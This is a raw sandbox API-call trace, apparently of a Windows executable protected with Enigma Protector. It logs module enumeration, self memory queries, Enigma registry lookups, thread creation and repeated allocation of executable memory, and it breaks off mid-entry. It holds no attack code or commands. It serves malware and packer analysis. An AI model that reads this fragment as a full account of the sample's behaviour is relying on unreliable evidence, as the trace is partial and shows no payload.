GetLastError () returned 0x0 [0174.446] SetLastError (dwErrCode=0x0) [0174.447] GetWindowsDirectoryA (in: lpBuffer=0x28fcfb, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0174.447] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0174.448] DeviceIoControl (in: hDevice=0x11c, dwIoControlCode=0x2d1400, lpInBuffer=0x28fe00*, nInBufferSize=0xc, lpOutBuffer=0x34201a8, nOutBufferSize=0x2710, lpBytesReturned=0x28fe10, lpOverlapped=0x0 | out: lpInBuffer=0x28fe00*, lpOutBuffer=0x34201a8*, lpBytesReturned=0x28fe10*=0xa7, lpOverlapped=0x0) returned 1 [0174.449] CloseHandle (hObject=0x11c) returned 1 [0174.450] GetLastError () returned 0x0 [0174.450] SetLastError (dwErrCode=0x0) [0174.450] GetLastError () returned 0x0 [0174.451] SetLastError (dwErrCode=0x0) [0174.451] GetLastError () returned 0x0 [0174.451] SetLastError (dwErrCode=0x0) [0174.451] GetLastError () returned 0x0 [0174.451] SetLastError (dwErrCode=0x0) [0174.451] GetLastError () returned 0x0 [0174.452] SetLastError (dwErrCode=0x0) [0174.452] GetLastError () returned 0x0 [0174.452] SetLastError (dwErrCode=0x0) [0174.452] GetLastError () returned 0x0 [0174.453] SetLastError (dwErrCode=0x0) [0174.453] GetLastError () returned 0x0 [0174.453] SetLastError (dwErrCode=0x0) [0174.453] GetLastError () returned 0x0 [0174.453] SetLastError (dwErrCode=0x0) [0174.454] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0174.454] GetLastError () returned 0x0 [0174.454] SetLastError (dwErrCode=0x0) [0174.454] GetLastError () returned 0x0 [0174.465] SetLastError (dwErrCode=0x0) [0174.465] GetLastError () returned 0x0 [0174.466] SetLastError (dwErrCode=0x0) [0174.466] GetCurrentProcessId () returned 0xb48 [0174.466] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0174.466] GetProcAddress (hModule=0x75a80000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ab7327 [0174.466] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListFirst") returned 0x75b15bc1 [0174.466] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListNext") returned 0x75b15c6b [0174.467] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32First") returned 0x75b15d03 [0174.467] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32Next") returned 0x75b15eee [0174.467] GetProcAddress (hModule=0x75a80000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75b160f3 [0174.467] GetProcAddress (hModule=0x75a80000, lpProcName="Process32First") returned 0x75ab8abb [0174.467] GetProcAddress (hModule=0x75a80000, lpProcName="Process32Next") returned 0x75ab8812 [0174.468] GetProcAddress (hModule=0x75a80000, lpProcName="Process32FirstW") returned 0x75ab8b83 [0174.468] GetProcAddress (hModule=0x75a80000, lpProcName="Process32NextW") returned 0x75ab88da [0174.468] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32First") returned 0x75b16133 [0174.468] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32Next") returned 0x75b161df [0174.468] GetProcAddress (hModule=0x75a80000, lpProcName="Module32First") returned 0x75b16279 [0174.469] GetProcAddress (hModule=0x75a80000, lpProcName="Module32Next") returned 0x75b16362 [0174.469] GetProcAddress (hModule=0x75a80000, lpProcName="Module32FirstW") returned 0x75ab79c1 [0174.469] GetProcAddress (hModule=0x75a80000, lpProcName="Module32NextW") returned 0x75ab7d5e [0174.469] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xb48) returned 0x120 [0174.479] Module32First (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.480] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.482] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.483] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.485] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.772] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.774] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.775] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.777] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.778] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.780] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.781] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.787] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.789] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.791] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.792] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.793] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.795] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.797] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.802] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.804] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.806] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.807] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.809] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.811] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.812] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0174.960] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 0 [0174.961] CloseHandle (hObject=0x120) returned 1 [0174.961] GetLastError () returned 0x12 [0174.962] SetLastError (dwErrCode=0x12) [0174.962] GetLastError () returned 0x12 [0174.962] SetLastError (dwErrCode=0x12) [0174.962] GetLastError () returned 0x12 [0174.962] SetLastError (dwErrCode=0x12) [0174.963] GetLastError () returned 0x12 [0174.963] SetLastError (dwErrCode=0x12) [0174.963] GetLastError () returned 0x12 [0174.963] SetLastError (dwErrCode=0x12) [0174.963] GetLastError () returned 0x12 [0174.963] SetLastError (dwErrCode=0x12) [0174.964] GetLastError () returned 0x12 [0174.964] SetLastError (dwErrCode=0x12) [0174.964] GetLastError () returned 0x12 [0174.964] SetLastError (dwErrCode=0x12) [0174.964] GetLastError () returned 0x12 [0174.964] SetLastError (dwErrCode=0x12) [0174.964] GetLastError () returned 0x12 [0174.965] SetLastError (dwErrCode=0x12) [0174.965] GetLastError () returned 0x12 [0174.965] SetLastError (dwErrCode=0x12) [0174.965] GetLastError () returned 0x12 [0174.965] SetLastError (dwErrCode=0x12) [0174.965] GetLastError () returned 0x12 [0174.965] SetLastError (dwErrCode=0x12) [0174.965] GetLastError () returned 0x12 [0174.966] SetLastError (dwErrCode=0x12) [0174.966] GetLastError () returned 0x12 [0174.966] SetLastError (dwErrCode=0x12) [0174.966] GetLastError () returned 0x12 [0174.966] SetLastError (dwErrCode=0x12) [0174.966] GetLastError () returned 0x12 [0174.966] SetLastError (dwErrCode=0x12) [0174.966] GetLastError () returned 0x12 [0174.967] SetLastError (dwErrCode=0x12) [0174.967] GetLastError () returned 0x12 [0174.967] SetLastError (dwErrCode=0x12) [0174.967] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0174.968] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0174.968] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0174.969] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0174.969] GetLastError () returned 0x0 [0174.974] SetLastError (dwErrCode=0x0) [0174.974] GetLastError () returned 0x0 [0174.974] SetLastError (dwErrCode=0x0) [0174.975] GetLastError () returned 0x0 [0174.975] SetLastError (dwErrCode=0x0) [0174.975] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1b000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.975] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.975] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.975] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0174.975] GetLastError () returned 0x0 [0174.976] SetLastError (dwErrCode=0x0) [0174.976] GetLastError () returned 0x0 [0174.976] SetLastError (dwErrCode=0x0) [0174.976] GetLastError () returned 0x0 [0174.976] SetLastError (dwErrCode=0x0) [0174.976] GetLastError () returned 0x0 [0174.977] SetLastError (dwErrCode=0x0) [0174.977] GetLastError () returned 0x0 [0174.977] SetLastError (dwErrCode=0x0) [0174.977] GetLastError () returned 0x0 [0174.977] SetLastError (dwErrCode=0x0) [0174.977] GetLastError () returned 0x0 [0174.978] SetLastError (dwErrCode=0x0) [0174.978] GetLastError () returned 0x0 [0174.978] SetLastError (dwErrCode=0x0) [0174.978] GetLastError () returned 0x0 [0174.978] SetLastError (dwErrCode=0x0) [0174.978] GetLastError () returned 0x0 [0174.979] SetLastError (dwErrCode=0x0) [0174.979] GetLastError () returned 0x0 [0174.979] SetLastError (dwErrCode=0x0) [0174.979] GetLastError () returned 0x0 [0174.979] SetLastError (dwErrCode=0x0) [0174.980] GetLastError () returned 0x0 [0174.980] SetLastError (dwErrCode=0x0) [0174.980] GetLastError () returned 0x0 [0174.980] SetLastError (dwErrCode=0x0) [0174.980] GetLastError () returned 0x0 [0174.981] SetLastError (dwErrCode=0x0) [0174.981] GetLastError () returned 0x0 [0174.981] SetLastError (dwErrCode=0x0) [0174.981] GetLastError () returned 0x0 [0174.981] SetLastError (dwErrCode=0x0) [0174.981] GetLastError () returned 0x0 [0174.982] SetLastError (dwErrCode=0x0) [0174.982] GetLastError () returned 0x0 [0174.982] SetLastError (dwErrCode=0x0) [0174.982] GetLastError () returned 0x0 [0174.982] SetLastError (dwErrCode=0x0) [0174.982] GetLastError () returned 0x0 [0174.983] SetLastError (dwErrCode=0x0) [0174.983] GetLastError () returned 0x0 [0174.983] SetLastError (dwErrCode=0x0) [0174.983] GetLastError () returned 0x0 [0174.983] SetLastError (dwErrCode=0x0) [0174.983] GetLastError () returned 0x0 [0174.984] SetLastError (dwErrCode=0x0) [0174.984] GetLastError () returned 0x0 [0174.984] SetLastError (dwErrCode=0x0) [0174.984] GetLastError () returned 0x0 [0174.984] SetLastError (dwErrCode=0x0) [0174.984] GetLastError () returned 0x0 [0174.985] SetLastError (dwErrCode=0x0) [0174.985] GetLastError () returned 0x0 [0174.985] SetLastError (dwErrCode=0x0) [0174.985] GetLastError () returned 0x0 [0174.990] SetLastError (dwErrCode=0x0) [0174.990] GetLastError () returned 0x0 [0174.990] SetLastError (dwErrCode=0x0) [0174.990] GetLastError () returned 0x0 [0174.990] SetLastError (dwErrCode=0x0) [0174.991] GetLastError () returned 0x0 [0174.991] SetLastError (dwErrCode=0x0) [0174.991] GetLastError () returned 0x0 [0174.991] SetLastError (dwErrCode=0x0) [0174.991] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1b000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.991] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.992] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.992] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0174.992] GetLastError () returned 0x0 [0174.992] SetLastError (dwErrCode=0x0) [0174.992] GetLastError () returned 0x0 [0174.992] SetLastError (dwErrCode=0x0) [0174.993] GetLastError () returned 0x0 [0174.993] SetLastError (dwErrCode=0x0) [0174.993] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x28eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopers§©w", lpUsedDefaultChar=0x0) returned 25 [0174.994] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fdac | out: phkResult=0x28fdac*=0x0) returned 0x2 [0174.994] GetLastError () returned 0x0 [0174.994] SetLastError (dwErrCode=0x0) [0174.995] GetLastError () returned 0x0 [0174.995] SetLastError (dwErrCode=0x0) [0174.995] GetLastError () returned 0x0 [0174.995] SetLastError (dwErrCode=0x0) [0174.995] GetLastError () returned 0x0 [0174.996] SetLastError (dwErrCode=0x0) [0174.996] GetLastError () returned 0x0 [0174.996] SetLastError (dwErrCode=0x0) [0174.996] GetLastError () returned 0x0 [0174.996] SetLastError (dwErrCode=0x0) [0174.996] GetLastError () returned 0x0 [0174.997] SetLastError (dwErrCode=0x0) [0174.997] GetLastError () returned 0x0 [0174.997] SetLastError (dwErrCode=0x0) [0174.997] GetLastError () returned 0x0 [0174.997] SetLastError (dwErrCode=0x0) [0174.998] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0174.998] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0174.999] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="80EB2F5C", cbMultiByte=8, lpWideCharStr=0x28edd8, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆쐱Ď(䘨睝쒌Ď(V") returned 8 [0174.999] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0174.999] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0174.999] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0175.000] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fce4 | out: phkResult=0x28fce4*=0x0) returned 0x2 [0175.000] CreateFileW (lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.001] GetLocalTime (in: lpSystemTime=0x28fd24 | out: lpSystemTime=0x28fd24*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x340)) [0175.180] GetLastError () returned 0x0 [0175.180] SetLastError (dwErrCode=0x0) [0175.180] GetLastError () returned 0x0 [0175.180] SetLastError (dwErrCode=0x0) [0175.180] GetLastError () returned 0x0 [0175.181] SetLastError (dwErrCode=0x0) [0175.181] GetLocalTime (in: lpSystemTime=0x28fe50 | out: lpSystemTime=0x28fe50*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xb, wMilliseconds=0x13)) [0175.181] GetLastError () returned 0x0 [0175.181] SetLastError (dwErrCode=0x0) [0175.181] GetLastError () returned 0x0 [0175.182] SetLastError (dwErrCode=0x0) [0175.182] GetLastError () returned 0x0 [0175.182] SetLastError (dwErrCode=0x0) [0175.182] GetLastError () returned 0x0 [0175.182] SetLastError (dwErrCode=0x0) [0175.182] GetLastError () returned 0x0 [0175.182] SetLastError (dwErrCode=0x0) [0175.182] GetLastError () returned 0x0 [0175.183] SetLastError (dwErrCode=0x0) [0175.183] GetLastError () returned 0x0 [0175.183] SetLastError (dwErrCode=0x0) [0175.183] GetLastError () returned 0x0 [0175.183] SetLastError (dwErrCode=0x0) [0175.183] GetLastError () returned 0x0 [0175.183] SetLastError (dwErrCode=0x0) [0175.184] GetLastError () returned 0x0 [0175.184] SetLastError (dwErrCode=0x0) [0175.184] GetLastError () returned 0x0 [0175.184] SetLastError (dwErrCode=0x0) [0175.184] GetLastError () returned 0x0 [0175.184] SetLastError (dwErrCode=0x0) [0175.184] GetLastError () returned 0x0 [0175.185] SetLastError (dwErrCode=0x0) [0175.185] GetLastError () returned 0x0 [0175.185] SetLastError (dwErrCode=0x0) [0175.185] GetLastError () returned 0x0 [0175.185] SetLastError (dwErrCode=0x0) [0175.185] GetLastError () returned 0x0 [0175.186] SetLastError (dwErrCode=0x0) [0175.186] GetLastError () returned 0x0 [0175.186] SetLastError (dwErrCode=0x0) [0175.186] GetLastError () returned 0x0 [0175.186] SetLastError (dwErrCode=0x0) [0175.186] GetLastError () returned 0x0 [0175.187] SetLastError (dwErrCode=0x0) [0175.187] GetLastError () returned 0x0 [0175.187] SetLastError (dwErrCode=0x0) [0175.187] GetLastError () returned 0x0 [0175.187] SetLastError (dwErrCode=0x0) [0175.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523e84, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x28fe78 | out: lpThreadId=0x28fe78*=0xd3c) returned 0x120 [0175.195] GetLastError () returned 0x0 [0175.195] SetLastError (dwErrCode=0x0) [0175.196] GetLastError () returned 0x0 [0175.196] SetLastError (dwErrCode=0x0) [0175.196] GetLastError () returned 0x0 [0175.196] SetLastError (dwErrCode=0x0) [0175.196] GetLastError () returned 0x0 [0175.196] SetLastError (dwErrCode=0x0) [0175.196] GetLastError () returned 0x0 [0175.197] SetLastError (dwErrCode=0x0) [0175.197] GetLastError () returned 0x0 [0175.197] SetLastError (dwErrCode=0x0) [0175.198] GetLastError () returned 0x0 [0175.198] SetLastError (dwErrCode=0x0) [0175.198] GetLastError () returned 0x0 [0175.198] SetLastError (dwErrCode=0x0) [0175.198] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.199] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.199] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.199] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.200] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0175.201] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0175.201] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0175.202] GetLastError () returned 0x0 [0175.202] SetLastError (dwErrCode=0x0) [0175.202] GetLastError () returned 0x0 [0175.202] SetLastError (dwErrCode=0x0) [0175.202] GetLastError () returned 0x0 [0175.202] SetLastError (dwErrCode=0x0) [0175.203] GetCurrentProcessId () returned 0xb48 [0175.203] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xb48) returned 0x124 [0175.213] Module32First (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.215] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.218] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0175.218] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0175.218] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.226] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0175.226] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0175.478] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.480] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.491] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.497] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.645] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.651] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.654] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.683] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.685] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.692] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.694] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.697] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.977] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.982] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.990] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0175.996] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.006] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.012] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.208] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.213] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.225] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.227] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.239] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0176.242] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 0 [0176.244] CloseHandle (hObject=0x124) returned 1 [0176.245] GetLastError () returned 0x12 [0176.245] SetLastError (dwErrCode=0x12) [0176.245] GetLastError () returned 0x12 [0176.245] SetLastError (dwErrCode=0x12) [0176.246] GetLastError () returned 0x12 [0176.246] SetLastError (dwErrCode=0x12) [0176.246] VirtualAlloc (lpAddress=0x3424000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0176.394] VirtualFree (lpAddress=0x3424000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0176.396] GetLastError () returned 0x12 [0176.396] SetLastError (dwErrCode=0x12) [0176.396] GetLastError () returned 0x12 [0176.396] SetLastError (dwErrCode=0x12) [0176.396] GetLastError () returned 0x12 [0176.397] SetLastError (dwErrCode=0x12) [0176.397] GetLastError () returned 0x12 [0176.397] SetLastError (dwErrCode=0x12) [0176.397] GetLastError () returned 0x12 [0176.398] SetLastError (dwErrCode=0x12) [0176.398] GetLastError () returned 0x12 [0176.398] SetLastError (dwErrCode=0x12) [0176.398] VirtualAlloc (lpAddress=0x3424000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0176.402] VirtualFree (lpAddress=0x3424000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0176.403] GetLastError () returned 0x12 [0176.403] SetLastError (dwErrCode=0x12) [0176.404] GetLastError () returned 0x12 [0176.404] SetLastError (dwErrCode=0x12) [0176.404] GetLastError () returned 0x12 [0176.404] SetLastError (dwErrCode=0x12) [0176.404] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x13000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.404] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.405] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.405] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0176.405] GetLastError () returned 0x12 [0176.410] SetLastError (dwErrCode=0x12) [0176.410] GetLastError () returned 0x12 [0176.410] SetLastError (dwErrCode=0x12) [0176.410] GetLastError () returned 0x12 [0176.410] SetLastError (dwErrCode=0x12) [0176.410] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x13000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.411] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.411] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0176.411] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0176.411] GetLastError () returned 0x12 [0176.411] SetLastError (dwErrCode=0x12) [0176.411] GetLastError () returned 0x12 [0176.411] SetLastError (dwErrCode=0x12) [0176.411] GetLastError () returned 0x12 [0176.412] SetLastError (dwErrCode=0x12) [0176.412] VirtualAlloc (lpAddress=0x3424000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0176.429] VirtualFree (lpAddress=0x3424000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0176.430] VirtualAlloc (lpAddress=0x3424000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0176.432] VirtualFree (lpAddress=0x3424000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0176.433] GetLastError () returned 0x12 [0176.433] SetLastError (dwErrCode=0x12) [0176.433] GetLastError () returned 0x12 [0176.434] SetLastError (dwErrCode=0x12) [0176.434] GetLastError () returned 0x12 [0176.434] SetLastError (dwErrCode=0x12) [0176.434] VirtualAlloc (lpAddress=0x3424000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 